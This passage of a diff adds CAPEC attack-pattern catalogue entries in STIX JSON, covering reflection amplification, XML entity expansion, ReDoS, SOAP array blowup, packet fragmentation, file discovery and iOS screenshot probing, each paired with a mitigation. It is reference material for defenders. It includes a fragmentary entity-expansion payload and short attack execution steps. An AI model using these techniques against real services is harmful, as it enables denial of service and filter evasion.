"target_ref": "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Put together a strong password policy and make sure that all user created passwords comply with it. 
Alternatively automatically generate strong passwords for users.", + "id": "course-of-action--67382257-6794-48ac-82a0-f33260b6f0db", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-49-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c0f08626-b782-458e-bf5e-36ceaf04f850", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--67382257-6794-48ac-82a0-f33260b6f0db", + "target_ref": "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Passwords need to be recycled to prevent aging, that is every once in a while a new password must be chosen.", + "id": "course-of-action--bb36d937-986b-43eb-aa65-3e773af8ce32", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-49-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fb2ec194-be12-4cc9-8d13-70492fffaff4", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bb36d937-986b-43eb-aa65-3e773af8ce32", + "target_ref": "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + 
"created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute an amplification where the size of a response is far greater than that of the request that generates it. The goal of this attack is to use a relatively few resources to create a large amount of traffic against a target server. To execute this attack, an adversary send a request to a 3rd party service, spoofing the source address to be that of the target server. The larger response that is generated by the 3rd party service is then sent to the target server. By sending a large number of initial requests, the adversary can generate a tremendous amount of traffic directed at the target. The greater the discrepancy in size between the initial request and the final payload delivered to the target increased the effectiveness of this attack.", + "external_references": [ + { + "external_id": "CAPEC-490", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/490.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "Network Denial of Service:Reflection Amplification", + "external_id": "T1498.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1498/002" + } + ], + "id": "attack-pattern--e68b5623-7a7a-45f8-896f-12b38bedc838", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Amplification", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the existence of a 3rd party service that generates a response that is significantly larger than the request that triggers it." 
+ ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of an attack, an organization can attempt to identify the 3rd party services being used in an active attack and blocking them until the attack ends. This can be accomplished by filtering traffic for suspicious message patterns such as a spike in traffic where each response contains the same large block of data. Care should be taken to prevent false positive rates so legitimate traffic isn't blocked.", + "id": "course-of-action--d0ed5ae3-a632-40b6-adec-abee22f9f753", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-490-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f777f7b6-4f71-48a6-89b5-694f5210cb6b", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d0ed5ae3-a632-40b6-adec-abee22f9f753", + "target_ref": "attack-pattern--e68b5623-7a7a-45f8-896f-12b38bedc838", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits macro-like substitution to cause a denial of service situation due to excessive memory being allocated to fully expand the data. The result of this denial of service could cause the application to freeze or crash. This involves defining a very large entity and using it multiple times in a single entity substitution. 
CAPEC-197 is a similar attack pattern, but it is easier to discover and defend against. This attack pattern does not perform multi-level substitution and therefore does not obviously appear to consume extensive resources.", + "external_references": [ + { + "external_id": "CAPEC-491", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/491.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + } + ], + "id": "attack-pattern--8f70b1fb-393f-4494-b4ad-67f1a2107975", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Quadratic Data Expansion", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_alternate_terms": [ + "XML Entity Expansion (XEE)" + ], + "x_capec_can_follow_refs": [ + "attack-pattern--5cf3eacf-a0c6-4c59-9f97-4f677a90587a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--8abd01d1-b2a2-4b86-a640-7d3d3b61d27f" + ], + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (Denial of Service)", + "Resource Consumption (Denial of Service)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n In this example the attacker defines one large entity and refers to it many times.\n ... [100K of them] ...AAAA\">]>&x;&x;... [100K of them]...&x;&x;\n This results in a relatively small message of 100KBs that will expand to a message in the GB range.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the target: An adversary determines the input data stream that is being processed by a data parser that supports using substituion on the victim's side.

  2. Techniques
    Use an automated tool to record all instances of URLs to process requests.
    Use a browser to manually explore the website and analyze how the application processes requests.

Exploit

  1. Craft malicious payload: The adversary crafts malicious message containing nested quadratic expansion that completely uses up available server resource.

  2. Send the message: Send the malicious crafted message to the target URL.

", + "x_capec_prerequisites": [ + "This type of attack requires a server that accepts serialization data which supports substitution and parses the data." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--02109430-cdab-456f-831f-cbf8dc34209a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7cdc228e-d1d1-40c4-b9c4-9e9f89b3df71", + "target_ref": "attack-pattern--8f70b1fb-393f-4494-b4ad-67f1a2107975", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--aad3b8f3-e7c0-49fd-8535-2db1e2a789ee", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2a17594-fbe4-4682-92b8-c64f405f7e3c", + "target_ref": "attack-pattern--8f70b1fb-393f-4494-b4ad-67f1a2107975", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute an attack on a program that uses a poor Regular Expression(Regex) implementation by choosing input that results in an extreme situation for the Regex. A typical extreme situation operates at exponential time compared to the input size. 
This is due to most implementations using a Nondeterministic Finite Automaton(NFA) state machine to be built by the Regex algorithm since NFA allows backtracking and thus more complex regular expressions.", + "external_references": [ + { + "external_id": "CAPEC-492", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/492.html" + }, + { + "external_id": "CWE-400", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/400.html" + }, + { + "external_id": "CWE-1333", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1333.html" + }, + { + "description": "Regular expression Denial of Service - ReDoS", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS" + }, + { + "description": "Bryan Sullivan, Regular Expression Denial of Service Attacks and Defenses", + "external_id": "REF-421", + "source_name": "reference_from_CAPEC", + "url": "http://msdn.microsoft.com/en-au/magazine/ff646973.aspx" + } + ], + "id": "attack-pattern--dcf12181-3652-40c9-bb64-b09d367d2fb1", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Regular Expression Exponential Blowup", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n The algorithm builds a finite state machine and based on the input transitions through all the states until the end of the input is reached. NFA engines may evaluate each character in the input string multiple times during the backtracking. The algorithm tries each path through the NFA one by one until a match is found; the malicious input is crafted so every path is tried which results in a failure. 
Exploitation of the Regex results in programs hanging or taking a very long time to complete. These attacks may target various layers of the Internet due to regular expressions being used in validation.\n ", + "x_capec_prerequisites": [ + "This type of an attack requires the ability to identify hosts running a poorly implemented Regex, and the ability to send crafted input to exploit the regular expression." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Test custom written Regex with fuzzing to determine if the Regex is a poor one. Add timeouts to processes that handle the Regex logic. If an evil Regex is found rewrite it as a good Regex.", + "id": "course-of-action--304c8c69-2778-4990-bcbc-b9dcdf357054", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-492-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cbd942cb-719b-4645-a9fe-77e24232dbee", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--304c8c69-2778-4990-bcbc-b9dcdf357054", + "target_ref": "attack-pattern--dcf12181-3652-40c9-bb64-b09d367d2fb1", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute an attack on a web service that uses SOAP messages in communication. 
By sending a very large SOAP array declaration to the web service, the attacker forces the web service to allocate space for the array elements before they are parsed by the XML parser. The attacker message is typically small in size containing a large array declaration of say 1,000,000 elements and a couple of array elements. This attack targets exhaustion of the memory resources of the web service.", + "external_references": [ + { + "external_id": "CAPEC-493", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/493.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "SOAP Array Attack", + "external_id": "REF-422", + "source_name": "reference_from_CAPEC", + "url": "http://www.ws-attacks.org/index.php/Soap_Array_Attack" + } + ], + "id": "attack-pattern--c0166c89-dd49-46a7-9359-88a2c9d053e3", + "modified": "2019-09-30T00:00:00.000Z", + "name": "SOAP Array Blowup", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the attacker to know the endpoint of the web service, and be able to reach the endpoint with a malicious SOAP message." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Enforce strict schema validation. The schema should enforce a maximum number of array elements. If the number of maximum array elements can't be limited another validation method should be used. One such method could be comparing the declared number of items in the array with the existing number of elements of the array. 
If these numbers don't match drop the SOAP packet at the web service layer.", + "id": "course-of-action--0878f5f1-911e-488a-8d4e-1f242b96933f", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-493-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d8f6f476-720d-4647-8211-640732114f60", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0878f5f1-911e-488a-8d4e-1f242b96933f", + "target_ref": "attack-pattern--c0166c89-dd49-46a7-9359-88a2c9d053e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute a TCP Fragmentation attack against a target with the intention of avoiding filtering rules of network controls, by attempting to fragment the TCP packet such that the headers flag field is pushed into the second fragment which typically is not filtered.", + "external_references": [ + { + "external_id": "CAPEC-494", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/494.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "external_id": "CWE-404", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/404.html" + }, + { + "description": "Security Considerations - IP Fragment Filtering", + "external_id": "REF-423", + "source_name": "reference_from_CAPEC", + "url": "https://www.rfc-editor.org/rfc/rfc1858.txt" + } + ], + "id": "attack-pattern--753614f7-f574-4a2f-9cc4-481c62c25c32", + 
"modified": "2022-02-22T00:00:00.000Z", + "name": "TCP Fragmentation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_extended_description": "\n In comparison, IP fragmentation occurs when an IP datagram is larger than the MTU of the route the datagram has to traverse. This behavior of fragmentation defeats some IPS and firewall filters who typically check the FLAGS in the header of the first packet since dropping this packet prevents the following fragments from being processed and assembled.\n Another variation is overlapping fragments thus that an innocuous first segment passes the filter and the second segment overwrites the TCP header data with the true payload which is malicious in nature. The malicious payload manipulated properly may lead to a DoS due to resource consumption or kernel crash. Additionally the fragmentation could be used in conjunction with sending fragments at a rate slightly slower than the timeout to cause a DoS condition by forcing resources that assemble the packet to wait an inordinate amount of time to complete the task. The fragmentation identification numbers could also be duplicated very easily as there are only 16 bits in IPv4 so only 65536 packets are needed.\n ", + "x_capec_prerequisites": [ + "This type of an attack requires the target system to be running a vulnerable implementation of IP, and the adversary needs to ability to send TCP packets of arbitrary size with crafted data." 
+ ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack may be mitigated by enforcing rules at the router following the guidance of RFC1858. The essential part of the guidance is creating the following rule \"IF FO=1 and PROTOCOL=TCP then DROP PACKET\" as this mitigated both tiny fragment and overlapping fragment attacks in IPv4. In IPv6 overlapping(RFC5722) additional steps may be required such as deep packet inspection. The delayed fragments may be mitigated by enforcing a timeout on the transmission to receive all packets by a certain time since the first packet is received. According to RFC2460 IPv6 implementations should enforce a rule to discard all fragments if the fragments are not ALL received within 60 seconds of the FIRST arriving fragment.", + "id": "course-of-action--8d367dc3-d87f-4810-8600-406d591143ad", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-494-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4c63b7b2-466c-4c0a-9b40-4dc3b26ad502", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8d367dc3-d87f-4810-8600-406d591143ad", + "target_ref": "attack-pattern--753614f7-f574-4a2f-9cc4-481c62c25c32", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker may execute a UDP Fragmentation attack against a target server in an attempt to consume resources 
such as bandwidth and CPU. IP fragmentation occurs when an IP datagram is larger than the MTU of the route the datagram has to traverse. Typically the attacker will use large UDP packets over 1500 bytes of data which forces fragmentation as ethernet MTU is 1500 bytes. This attack is a variation on a typical UDP flood but it enables more network bandwidth to be consumed with fewer packets. Additionally it has the potential to consume server CPU resources and fill memory buffers associated with the processing and reassembling of fragmented packets.", + "external_references": [ + { + "external_id": "CAPEC-495", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/495.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "external_id": "CWE-404", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/404.html" + }, + { + "description": "Yossi Gilad, Amir Herzberg, Fragmentation Considered Vulnerable, 2012", + "external_id": "REF-424", + "source_name": "reference_from_CAPEC", + "url": "http://u.cs.biu.ac.il/~herzbea/security/12-03%20fragmentation.pdf" + } + ], + "id": "attack-pattern--428d5dc6-c2be-4a2a-aed1-1e794518b101", + "modified": "2019-04-04T00:00:00.000Z", + "name": "UDP Fragmentation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the attacker to be able to generate fragmented IP traffic containing crafted data." 
+ ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack may be mitigated by changing default cache sizes to be larger at the OS level. Additionally rules can be enforced to prune the cache with shorter timeouts for packet reassembly as the cache nears capacity.", + "id": "course-of-action--30d838cf-1c32-4edd-b3aa-796095ba5314", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-495-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9a8d2ca3-6686-47c3-ba2b-0bd391ee4af9", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--30d838cf-1c32-4edd-b3aa-796095ba5314", + "target_ref": "attack-pattern--428d5dc6-c2be-4a2a-aed1-1e794518b101", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker may execute a ICMP Fragmentation attack against a target with the intention of consuming resources or causing a crash. The attacker crafts a large number of identical fragmented IP packets containing a portion of a fragmented ICMP message. The attacker these sends these messages to a target host which causes the host to become non-responsive. 
Another vector may be sending a fragmented ICMP message to a target host with incorrect sizes in the header which causes the host to hang.", + "external_references": [ + { + "external_id": "CAPEC-496", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/496.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "external_id": "CWE-404", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/404.html" + }, + { + "description": "ICMP Attacks Illustrated", + "external_id": "REF-425", + "source_name": "reference_from_CAPEC", + "url": "http://www.sans.org/reading-room/whitepapers/threats/icmp-attacks-illustrated-477?show=icmp-attacks-illustrated-477&cat=threats" + } + ], + "id": "attack-pattern--fbdcbfab-769d-4d52-8ec2-7fd1e4c212de", + "modified": "2019-04-04T00:00:00.000Z", + "name": "ICMP Fragmentation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the target system to be running a vulnerable implementation of IP, and the attacker needs to ability to send arbitrary sized ICMP packets to the target." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack may be mitigated through egress filtering based on ICMP payload so a network is a \"good neighbor\" to other networks. 
Bad IP implementations become patched, so using the proper version of a browser or OS is recommended.", + "id": "course-of-action--f1132180-9c58-4be8-8ef6-dedb17aed57e", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-496-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b4385941-4381-4b52-8fff-1a5170cad3da", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f1132180-9c58-4be8-8ef6-dedb17aed57e", + "target_ref": "attack-pattern--fbdcbfab-769d-4d52-8ec2-7fd1e4c212de", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2019-09-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in probing and exploration activities to determine if common key files exists. Such files often contain configuration and security parameters of the targeted application, system or network. 
Using this knowledge may often pave the way for more damaging attacks.", + "external_references": [ + { + "external_id": "CAPEC-497", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/497.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "File and Directory Discovery", + "external_id": "T1083", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1083" + } + ], + "id": "attack-pattern--323ed142-7793-413d-838f-72626caf58da", + "modified": "2020-12-17T00:00:00.000Z", + "name": "File Discovery", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--bddd2549-167f-4f7b-8d0f-6d1e647b26f6" + ], + "x_capec_prerequisites": [ + "The adversary must know the location of these common key files." 
+ ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very Low", + "x_capec_version": "3.9" + }, + { + "created": "2019-09-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage file protection mechanisms to render these files accessible only to authorized parties.", + "id": "course-of-action--54c4cc5a-fe59-4f27-82bc-a2e6d27d80b7", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-497-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2019-09-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--47804bd8-6b7f-435e-b2e4-277a8a51384e", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--54c4cc5a-fe59-4f27-82bc-a2e6d27d80b7", + "target_ref": "attack-pattern--323ed142-7793-413d-838f-72626caf58da", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary examines screenshot images created by iOS in an attempt to obtain sensitive information. 
This attack targets temporary screenshots created by the underlying OS while the application remains open in the background.", + "external_references": [ + { + "external_id": "CAPEC-498", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/498.html" + }, + { + "external_id": "CWE-359", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/359.html" + }, + { + "description": "Jonathan Zdziarksi, Hacking and Securing iOS Applications (First Edition), 2012, O'Reilly Media, Inc.", + "external_id": "REF-426", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--1b75b059-c9ee-4c4d-b016-bafb20cce96b", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Probe iOS Screenshots", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "These images are used by iOS to aid in the visual transition between open applications and improve the user's experience with a device. An application can be at risk even if it properly protects sensitive information when at rest. If the application displays sensitive information on the screen, then the potential exists for iOS to unintentionally record that information in an image file. An adversary can retrieve these images either by gaining access to the image files, or by physically obtaining the device and leveraging the multitasking switcher interface. 
This attack differs from CAPEC-648, which targets intentional screenshots initiated by an end-user that are stored in the device's storage.", + "x_capec_prerequisites": [ + "This type of an attack requires physical access to a device to either excavate the image files (potentially by leveraging a Jailbreak) or view the screenshots through the multitasking switcher (by double tapping the home button on the device)." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of an attack, an application that may display sensitive information should clear the screen contents before a screenshot is taken. This can be accomplished by setting the key window's hidden property to YES. This code to hide the contents should be placed in both the applicationWillResignActive() and applicationDidEnterBackground() methods.", + "id": "course-of-action--bf6e6d14-40c1-4f5f-9acd-1ad186a51940", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-498-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 